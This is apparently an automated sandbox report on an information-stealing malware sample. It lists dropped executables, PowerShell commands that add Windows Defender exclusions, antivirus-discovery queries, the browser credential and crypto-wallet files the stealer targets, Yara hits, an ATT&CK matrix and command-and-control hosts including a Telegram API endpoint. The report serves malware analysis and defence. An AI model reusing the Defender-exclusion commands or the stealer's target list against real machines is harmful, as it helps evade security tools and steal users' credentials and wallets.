Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Process created: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe "C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe"
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Process created: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe "C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe"
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Process created: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe"
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe'
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: 0_2_0040C904 cpuid 0_2_0040C904
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_0040D007
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: GetLocaleInfoA,0_2_00425CA0
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: 0_2_00411104 GetSystemTime,SystemTimeToFileTime,0_2_00411104
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: 0_2_00409B26 GetVersionExW,0_2_00409B26
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: YsrQekGS.exe, 00000004.00000002.2940564009.000000001C290000.00000004.00000020.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000002.2937204022.000000001B7D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED
Source: Yara match | File source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
Source: Yara match | File source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2912640995.0000000002756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED
Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ElectrumRule
Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: JaxxxLibertyAfihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp | String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusRule
Source: powershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: Yara match | File source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED

                            Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED
Source: Yara match | File source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
Source: Yara match | File source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2912640995.0000000002756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED
MITRE ATT&CK Matrix (a number before a technique name is the count shown in the matrix cell):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 221 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 11 Deobfuscate/Decode Files or Information | 1 Input Capture | 2 File and Directory Discovery | Remote Desktop Protocol | 3 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 11 Process Injection | 21 Obfuscated Files or Information | Security Account Manager | 137 System Information Discovery | SMB/Windows Admin Shares | 1 Input Capture | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 21 Software Packing | NTDS | 341 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 11 Non-Standard Port | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 241 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 14 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 241 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 11 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1474423, Sample: Ekpb7jn7mf.exe, Startdate: 16/07/2024, Architecture: WINDOWS, Score: 100

Start
  DNS/IP: api.telegram.org
    Signature: Uses the Telegram API (likely for C&C communication)
  DNS/IP: pst-child.gl.at.ply.gg
  DNS/IP: api.ip.sb
  Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures
  Process: Ekpb7jn7mf.exe 10 (started)
    Dropped: C:\Users\user\AppData\Local\...\wjoqZlIS.exe, PE32
    Dropped: C:\Users\user\AppData\Local\...\rKPaQokQ.exe, PE32+
    Dropped: C:\Users\user\AppData\Local\...\YsrQekGS.exe, PE32
